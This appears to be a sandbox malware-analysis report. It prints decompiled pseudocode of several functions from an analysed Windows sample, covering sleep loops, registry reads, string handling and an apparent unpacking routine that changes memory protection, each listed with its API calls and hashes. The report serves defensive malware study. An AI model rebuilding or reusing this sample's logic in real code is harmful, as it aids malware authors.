                            • RegCloseKey.KERNELBASE(014A9F02,?,006D2410,3D006D90,80000002,006D68B1,00000000,006D68B1,?,014A9F02,80000002,00000000,?), ref: 006D7963
                              • Part of subcall function 006D2B8C: SafeArrayDestroy.OLEAUT32(00000000), ref: 006D2C14
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                            • String ID:
                            • API String ID: 486277218-0
                            • Opcode ID: 6a0b356b85acf9daffea26d8b6504a04de464d1cf39ec5ceb4ae23302130d49c
                            • Instruction ID: b368475694816eea2f8ccbd26dd5945c8edaba05956a54163aac1997234f70c0
                            • Opcode Fuzzy Hash: 6a0b356b85acf9daffea26d8b6504a04de464d1cf39ec5ceb4ae23302130d49c
                            • Instruction Fuzzy Hash: 1A21FC7390411EAFCF119F94DC80CEE7BAAEB04350B14852AFE159A320E6319E61ABD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E006D2CEC(void* __ecx, intOrPtr _a4) {
                            				struct _FILETIME _v12;
                            				int _t13;
                            				signed int _t16;
                            				void* _t17;
                            				signed int _t18;
                            				unsigned int _t22;
                            				void* _t30;
                            				signed int _t34;
                            
                            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                            				asm("stosd");
                            				do {
                            					_t13 = SwitchToThread();
                            					GetSystemTimeAsFileTime( &_v12);
                            					_t22 = _v12.dwHighDateTime;
                            					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                            					_push(0);
                            					_push(0x13);
                            					_push(_t22 >> 5);
                            					_push(_t16);
                            					L006D8406();
                            					_t34 = _t16 + _t13;
                            					_t17 = E006D4D24(_a4, _t34);
                            					_t30 = _t17;
                            					_t18 = 3;
                            					Sleep(_t18 << (_t34 & 0x00000007)); // executed
                            				} while (_t30 == 1);
                            				return _t30;
                            			}

                            APIs
                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,006D72FE,?,?), ref: 006D2CFD
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,006D72FE,?,?), ref: 006D2D09
                            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 006D2D22
                              • Part of subcall function 006D4D24: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 006D4DC3
                            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,006D72FE,?,?), ref: 006D2D41
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                            • String ID:
                            • API String ID: 1610602887-0
                            • Opcode ID: 2c1ac58b403eb4e4fad1df6ade3967425556f73f68294ee03fb79d41d4678a17
                            • Instruction ID: 15380382b0f2cf4d1eef1489c3e667680fc69e2586011adad82b3932aa22b663
                            • Opcode Fuzzy Hash: 2c1ac58b403eb4e4fad1df6ade3967425556f73f68294ee03fb79d41d4678a17
                            • Instruction Fuzzy Hash: 4AF0A477E402047BD7149BA4DC5EFDF77BADB84361F100129F602E7340E9B49A0186A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E006D3D80(void** __esi) {
                            				intOrPtr _v0;
                            				intOrPtr _t4;
                            				intOrPtr _t6;
                            				void* _t8;
                            				void* _t9;
                            				intOrPtr _t10;
                            				void* _t11;
                            				void** _t13;
                            
                            				_t13 = __esi;
                            				_t4 =  *0x6da3cc; // 0x14a9600
                            				__imp__(_t4 + 0x40);
                            				while(1) {
                            					_t6 =  *0x6da3cc; // 0x14a9600
                            					_t1 = _t6 + 0x58; // 0x0
                            					if( *_t1 == 0) {
                            						break;
                            					}
                            					Sleep(0xa);
                            				}
                            				_t8 =  *_t13;
                            				if(_t8 != 0 && _t8 != 0x6da030) {
                            					HeapFree( *0x6da2d8, 0, _t8);
                            				}
                            				_t9 = E006D4076(_v0, _t13); // executed
                            				_t13[1] = _t9;
                            				_t10 =  *0x6da3cc; // 0x14a9600
                            				_t11 = _t10 + 0x40;
                            				__imp__(_t11);
                            				return _t11;
                            			}

                            APIs
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D3D89
                            • Sleep.KERNEL32(0000000A), ref: 006D3D93
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3DBB
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D3DD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: e13d2c80b1d65ca428d89af5677de4e934151f4e43aca19a4e52a56241df4e9b
                            • Instruction ID: 0c5a5ea1ef70f7daeeb105798524513e1e39c5a1fdc6ff10f6423e1953ca1ac4
                            • Opcode Fuzzy Hash: e13d2c80b1d65ca428d89af5677de4e934151f4e43aca19a4e52a56241df4e9b
                            • Instruction Fuzzy Hash: 0EF0F870E06261ABDB24AFA9EC48F563BA7AF54340B04A41BF546D63B1C730DD40DB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D61FE(void* __edx) {
                            				void* _v8;
                            				int _v12;
                            				WCHAR* _v16;
                            				void* __edi;
                            				void* __esi;
                            				void* _t23;
                            				intOrPtr _t24;
                            				void* _t26;
                            				intOrPtr _t32;
                            				intOrPtr _t35;
                            				intOrPtr _t38;
                            				intOrPtr _t42;
                            				void* _t45;
                            				void* _t50;
                            				void* _t52;
                            
                            				_t50 = __edx;
                            				_v12 = 0;
                            				_t23 = E006D1CE6(0,  &_v8); // executed
                            				if(_t23 != 0) {
                            					_v8 = 0;
                            				}
                            				_t24 =  *0x6da348; // 0xdcd5a8
                            				_t4 = _t24 + 0x6dbe30; // 0x14a93d8
                            				_t5 = _t24 + 0x6dbdd8; // 0x4f0053
                            				_t26 = E006D3A53( &_v16, _v8, _t5, _t4); // executed
                            				_t45 = _t26;
                            				if(_t45 == 0) {
                            					StrToIntExW(_v16, 0,  &_v12);
                            					_t45 = 8;
                            					if(_v12 < _t45) {
                            						_t45 = 1;
                            						__eflags = 1;
                            					} else {
                            						_t32 =  *0x6da348; // 0xdcd5a8
                            						_t11 = _t32 + 0x6dbe24; // 0x14a93cc
                            						_t48 = _t11;
                            						_t12 = _t32 + 0x6dbdd8; // 0x4f0053
                            						_t52 = E006D262D(_t11, _t12, _t11);
                            						_t59 = _t52;
                            						if(_t52 != 0) {
                            							_t35 =  *0x6da348; // 0xdcd5a8
                            							_t13 = _t35 + 0x6dbe6e; // 0x30314549
                            							if(E006D3969(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                            								_t61 =  *0x6da2fc - 6;
                            								if( *0x6da2fc <= 6) {
                            									_t42 =  *0x6da348; // 0xdcd5a8
                            									_t15 = _t42 + 0x6dbdba; // 0x52384549
                            									E006D3969(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                            								}
                            							}
                            							_t38 =  *0x6da348; // 0xdcd5a8
                            							_t17 = _t38 + 0x6dbe68; // 0x14a9410
                            							_t18 = _t38 + 0x6dbe40; // 0x680043
                            							_t45 = E006D187F(_v8, 0x80000001, _t52, _t18, _t17);
                            							HeapFree( *0x6da2d8, 0, _t52);
                            						}
                            					}
                            					HeapFree( *0x6da2d8, 0, _v16);
                            				}
                            				_t54 = _v8;
                            				if(_v8 != 0) {
                            					E006D1544(_t54);
                            				}
                            				return _t45;
                            			}

                            APIs
                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,014A93D8,00000000,?,74D0F710,00000000,74D0F730), ref: 006D624D
                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,014A9410,?,00000000,30314549,00000014,004F0053,014A93CC), ref: 006D62EA
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,006D521B), ref: 006D62FC
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 0c09c794eeb08ea03ce97376907f7be46c956164074f19fb9ccf163f45b671a1
                            • Instruction ID: 1eaea73be50203a3f2bd5694cf7d59aa08e36d0230f97c1150c1ed9f341f8ed4
                            • Opcode Fuzzy Hash: 0c09c794eeb08ea03ce97376907f7be46c956164074f19fb9ccf163f45b671a1
                            • Instruction Fuzzy Hash: 2A318932D01208ABCB119BD5DC45EEA3BBBEB48700F1510ABF601A7261D6B19A04DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E006D64A2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                            				void* _v8;
                            				char _v48;
                            				void* __edi;
                            				intOrPtr _t22;
                            				intOrPtr _t30;
                            				intOrPtr _t34;
                            				intOrPtr* _t42;
                            				void* _t43;
                            				void* _t46;
                            				intOrPtr* _t48;
                            				void* _t49;
                            				intOrPtr _t51;
                            
                            				_t42 = _a16;
                            				_t48 = __eax;
                            				_t22 =  *0x6da348; // 0xdcd5a8
                            				_t2 = _t22 + 0x6db67a; // 0x657a6973
                            				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                            				if( *0x6da2ec >= 5) {
                            					_t30 = E006D3643(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                            					L5:
                            					_a4 = _t30;
                            					L6:
                            					if(_a4 != 0) {
                            						L9:
                            						 *0x6da2ec =  *0x6da2ec + 1;
                            						L10:
                            						return _a4;
                            					}
                            					_t50 = _a16;
                            					 *_t48 = _a16;
                            					_t49 = _v8;
                            					 *_t42 = E006D7194(_t50, _t49); // executed
                            					_t34 = E006D1EDF(_t49, _t50); // executed
                            					if(_t34 != 0) {
                            						 *_a8 = _t49;
                            						 *_a12 = _t34;
                            						if( *0x6da2ec < 5) {
                            							 *0x6da2ec =  *0x6da2ec & 0x00000000;
                            						}
                            						goto L10;
                            					}
                            					_a4 = 0xbf;
                            					E006D14C6();
                            					HeapFree( *0x6da2d8, 0, _t49);
                            					goto L9;
                            				}
                            				_t51 =  *0x6da3e0; // 0x14a9be8
                            				if(RtlAllocateHeap( *0x6da2d8, 0, 0x800) == 0) {
                            					_a4 = 8;
                            					goto L6;
                            				}
                            				_t30 = E006D6CA4(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                            				goto L5;
                            			}

                            APIs
                            • wsprintfA.USER32 ref: 006D64C4
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 006D64E9
                              • Part of subcall function 006D6CA4: GetTickCount.KERNEL32 ref: 006D6CBB
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D08
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D25
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D47
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D6E
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6D8F
                              • Part of subcall function 006D6CA4: wsprintfA.USER32 ref: 006D6DBA
                              • Part of subcall function 006D6CA4: HeapFree.KERNEL32(00000000,?), ref: 006D6DCD
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 006D6563
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: wsprintf$Heap$Free$AllocateCountTick
                            • String ID:
                            • API String ID: 1307794992-0
                            • Opcode ID: 0d839b5035d6f2b89cc856d2e59ce20bd2dc8ec953560ce53c295ab66ea23571
                            • Instruction ID: 06061e1d3f072145b26d08161f6ebae3b2c3c1dbc75064191aecfd936ccf9b98
                            • Opcode Fuzzy Hash: 0d839b5035d6f2b89cc856d2e59ce20bd2dc8ec953560ce53c295ab66ea23571
                            • Instruction Fuzzy Hash: E6313871D01208EBCB01DFA5EC84A9A3BBAFB49354F148027F905E7360D771DA85CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E006D69D2(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                            				char _v5;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				char _t28;
                            				void* _t33;
                            				void* _t38;
                            				void* _t45;
                            				char* _t46;
                            				void* _t48;
                            				char* _t56;
                            				char* _t57;
                            				intOrPtr _t59;
                            				void* _t60;
                            
                            				_t56 = _a4;
                            				_t60 = __eax;
                            				_v12 = 0xb;
                            				if(_t56 != 0 && __eax != 0) {
                            					_t5 = _t60 - 1; // -1
                            					_t46 =  &(_t56[_t5]);
                            					_t28 =  *_t46;
                            					_v5 = _t28;
                            					 *_t46 = 0;
                            					__imp__(_a8, _t45);
                            					_v16 = _t28;
                            					_t57 = StrStrA(_t56, _a8);
                            					if(_t57 != 0) {
                            						 *_t46 = _v5;
                            						_t33 = RtlAllocateHeap( *0x6da2d8, 0, _a16 + _t60); // executed
                            						_t48 = _t33;
                            						if(_t48 == 0) {
                            							_v12 = 8;
                            						} else {
                            							_t58 = _t57 - _a4;
                            							E006D7A86(_t57 - _a4, _a4, _t48);
                            							_t38 = E006D7A86(_a16, _a12, _t58 + _t48);
                            							_t53 = _v16;
                            							_t59 = _a16;
                            							E006D7A86(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                            							 *_a20 = _t48;
                            							_v12 = _v12 & 0x00000000;
                            							 *_a24 = _t60 - _v16 + _t59;
                            						}
                            					}
                            				}
                            				return _v12;
                            			}

                            APIs
                            • lstrlen.KERNEL32(74D0F710,?,00000000,?,74D0F710), ref: 006D6A06
                            • StrStrA.SHLWAPI(00000000,?), ref: 006D6A13
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 006D6A32
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 556738718-0
                            • Opcode ID: 86d43d8207cfcf18c1ef7687f857c10560bdff0f1228e7665e050079174eff9b
                            • Instruction ID: 1fcacb111eb3d067a6cb982c0ed18661f741808d93bc93247f5ade6cec9e6196
                            • Opcode Fuzzy Hash: 86d43d8207cfcf18c1ef7687f857c10560bdff0f1228e7665e050079174eff9b
                            • Instruction Fuzzy Hash: 1D214A36A04249AFCB01DF68C884A9EBBB6AF85314F188156FC44AB315D731EA15CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00401E3D(void* __eax, void* _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				long _v20;
                            				int _t43;
                            				long _t54;
                            				signed int _t57;
                            				void* _t58;
                            				signed int _t60;
                            
                            				_v12 = _v12 & 0x00000000;
                            				_t57 =  *0x403180;
                            				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                            				_v16 =  *(__eax + 6) & 0x0000ffff;
                            				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                            				_v8 = _v8 & 0x00000000;
                            				if(_v16 <= 0) {
                            					L12:
                            					return _v12;
                            				} else {
                            					goto L1;
                            				}
                            				while(1) {
                            					L1:
                            					_t60 = _v12;
                            					if(_t60 != 0) {
                            						goto L12;
                            					}
                            					asm("bt [esi+0x24], eax");
                            					if(_t60 >= 0) {
                            						asm("bt [esi+0x24], eax");
                            						if(__eflags >= 0) {
                            							L8:
                            							_t54 = _t57 - 0x69b25f40;
                            							L9:
                            							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                            							if(_t43 == 0) {
                            								_v12 = GetLastError();
                            							}
                            							_v8 = _v8 + 1;
                            							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                            							if(_v8 < _v16) {
                            								continue;
                            							} else {
                            								goto L12;
                            							}
                            						}
                            						asm("bt [esi+0x24], eax");
                            						_t54 = _t57 - 0x69b25f42;
                            						if(__eflags >= 0) {
                            							goto L9;
                            						}
                            						goto L8;
                            					}
                            					asm("bt [esi+0x24], eax");
                            					if(_t60 >= 0) {
                            						_t54 = _t57 - 0x69b25f24;
                            					} else {
                            						_t54 = _t57 - 0x69b25f04;
                            					}
                            					goto L9;
                            				}
                            				goto L12;
                            			}

                            APIs
                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
                            • GetLastError.KERNEL32 ref: 00401EF1
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ProtectVirtual$ErrorLast
                            • String ID:
                            • API String ID: 1469625949-0
                            • Opcode ID: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                            • Instruction ID: 3241aa71f1d949b352c2025a784480cc2ce18444d2ae61006a318d933437353e
                            • Opcode Fuzzy Hash: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
                            • Instruction Fuzzy Hash: 6521607180020ADFCB14CF95C985EBEF7B4FF48345F11446AD506E7164E3B8AA64CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E006D4076(char* _a4, char** _a8) {
                            				char* _t7;
                            				char* _t11;
                            				char* _t14;
                            				char* _t16;
                            				char* _t17;
                            				char _t18;
                            				signed int _t20;
                            				signed int _t22;
                            
                            				_t16 = _a4;
                            				_push(0x20);
                            				_t20 = 1;
                            				_push(_t16);
                            				while(1) {
                            					_t7 = StrChrA();
                            					if(_t7 == 0) {
                            						break;
                            					}
                            					_t20 = _t20 + 1;
                            					_push(0x20);
                            					_push( &(_t7[1]));
                            				}
                            				_t11 = E006D7A71(_t20 << 2);
                            				_a4 = _t11;
                            				if(_t11 != 0) {
                            					StrTrimA(_t16, 0x6d9278); // executed
                            					_t22 = 0;
                            					do {
                            						_t14 = StrChrA(_t16, 0x20);
                            						if(_t14 != 0) {
                            							 *_t14 = 0;
                            							do {
                            								_t14 =  &(_t14[1]);
                            								_t18 =  *_t14;
                            							} while (_t18 == 0x20 || _t18 == 9);
                            						}
                            						_t17 = _a4;
                            						 *(_t17 + _t22 * 4) = _t16;
                            						_t22 = _t22 + 1;
                            						_t16 = _t14;
                            					} while (_t14 != 0);
                            					 *_a8 = _t17;
                            				}
                            				return 0;
                            			}

                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,014A95FC,?,?,006D3DCB,?,014A95FC), ref: 006D4092
                            • StrTrimA.KERNELBASE(?,006D9278,00000002,?,006D3DCB,?,014A95FC), ref: 006D40B0
                            • StrChrA.SHLWAPI(?,00000020,?,006D3DCB,?,014A95FC), ref: 006D40BB
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Trim
                            • String ID:
                            • API String ID: 3043112668-0
                            • Opcode ID: 275cb0ea83611004f260249d647cc8cfa56a59874a4b9d3504023c999e7f81d1
                            • Instruction ID: ea7efdf7620249f32e20b956761da975925ed4935a514d1bd1a3317a60dddb0d
                            • Opcode Fuzzy Hash: 275cb0ea83611004f260249d647cc8cfa56a59874a4b9d3504023c999e7f81d1
                            • Instruction Fuzzy Hash: 86019A71A04346ABEB204B6A8C88BA77B8EEB95340F445023AB41CB392DA30CC428260
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 64%
                            			E006D5854(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                            				intOrPtr _v36;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				void _v60;
                            				char _v64;
                            				long _t14;
                            				intOrPtr _t18;
                            				intOrPtr _t19;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				long _t28;
                            
                            				_t27 = __edi;
                            				_t26 = _a8;
                            				_t14 = E006D5E6F(_a4, _t26, __edi); // executed
                            				_t28 = _t14;
                            				if(_t28 != 0) {
                            					memset( &_v60, 0, 0x38);
                            					_t18 =  *0x6da348; // 0xdcd5a8
                            					_t28 = 0;
                            					_v64 = 0x3c;
                            					if(_a12 == 0) {
                            						_t7 = _t18 + 0x6db4e0; // 0x70006f
                            						_t19 = _t7;
                            					} else {
                            						_t6 = _t18 + 0x6db904; // 0x750072
                            						_t19 = _t6;
                            					}
                            					_v52 = _t19;
                            					_push(_t28);
                            					_v48 = _a4;
                            					_v44 = _t26;
                            					_v36 = _t27;
                            					E006D2058();
                            					_push( &_v64);
                            					if( *0x6da100() == 0) {
                            						_t28 = GetLastError();
                            					}
                            					_push(1);
                            					E006D2058();
                            				}
                            				return _t28;
                            			}
                            0x006d5854
                            0x006d585b
                            0x006d5864
                            0x006d5869
                            0x006d586d
                            0x006d5877
                            0x006d587c
                            0x006d5881
                            0x006d5886
                            0x006d5890
                            0x006d589a
                            0x006d589a
                            0x006d5892
                            0x006d5892
                            0x006d5892
                            0x006d5892
                            0x006d58a0
                            0x006d58a6
                            0x006d58a7
                            0x006d58aa
                            0x006d58ad
                            0x006d58b0
                            0x006d58b8
                            0x006d58c1
                            0x006d58c9
                            0x006d58c9
                            0x006d58cb
                            0x006d58cd
                            0x006d58cd
                            0x006d58d7

                            APIs
                              • Part of subcall function 006D5E6F: SysAllocString.OLEAUT32(00000000), ref: 006D5EC9
                              • Part of subcall function 006D5E6F: SysAllocString.OLEAUT32(0070006F), ref: 006D5EDD
                              • Part of subcall function 006D5E6F: SysAllocString.OLEAUT32(00000000), ref: 006D5EEF
                            • memset.NTDLL ref: 006D5877
                            • GetLastError.KERNEL32 ref: 006D58C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocString$ErrorLastmemset
                            • String ID: <
                            • API String ID: 3736384471-4251816714
                            • Opcode ID: c5c47e507a62a44808fee3d1dcf1e61b1e2fff4e8e862e3749f14e1896ad57c3
                            • Instruction ID: 4c18e2d5734201b2be0f96d0fc90e646555a6d7e83ef03d0b8fdf39df4cb2e6f
                            • Opcode Fuzzy Hash: c5c47e507a62a44808fee3d1dcf1e61b1e2fff4e8e862e3749f14e1896ad57c3
                            • Instruction Fuzzy Hash: 23014071D01628ABDB10EFA5DC85EEEBBFAAB08740F41402BF905E7351D7709905CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D2554(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				int _v12;
                            				signed int _v16;
                            				void* _v20;
                            				signed char _v36;
                            				void* _t24;
                            				intOrPtr _t27;
                            				void* _t35;
                            				signed int _t38;
                            				signed char* _t46;
                            				int _t53;
                            				void* _t55;
                            				void* _t56;
                            				void* _t57;
                            
                            				_v16 = _v16 & 0x00000000;
                            				_t46 = _a4;
                            				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                            				_v12 = 0x110;
                            				_t24 = E006D7A71(_t53);
                            				_a4 = _t24;
                            				if(_t24 != 0) {
                            					memcpy(_t24,  *0x6da374, 0x110);
                            					_t27 =  *0x6da378; // 0x0
                            					_t57 = _t56 + 0xc;
                            					if(_t27 != 0) {
                            						_t51 = _a4;
                            						E006D606D(0x110, _a4, _t27, 0);
                            					}
                            					if(E006D5E3C( &_v36) != 0) {
                            						_t35 = E006D47E5(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                            						if(_t35 == 0) {
                            							_t55 = _v20;
                            							_v36 =  *_t46;
                            							_t38 = E006D1DBC(_t55, _a8, _t51, _t46, _a12); // executed
                            							_v16 = _t38;
                            							 *(_t55 + 4) = _v36;
                            							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                            							_t57 = _t57 + 0xc;
                            							E006D789E(_t55);
                            						}
                            					}
                            					memset(_a4, 0, _t53);
                            					E006D789E(_a4);
                            				}
                            				return _v16;
                            			}
                            0x006d255a
                            0x006d255f
                            0x006d256c
                            0x006d256f
                            0x006d2572
                            0x006d2577
                            0x006d257c
                            0x006d258a
                            0x006d258f
                            0x006d2594
                            0x006d2599
                            0x006d259b
                            0x006d25a3
                            0x006d25a3
                            0x006d25b2
                            0x006d25c7
                            0x006d25ce
                            0x006d25d5
                            0x006d25db
                            0x006d25e1
                            0x006d25e9
                            0x006d25ef
                            0x006d25ff
                            0x006d2604
                            0x006d2608
                            0x006d2608
                            0x006d25ce
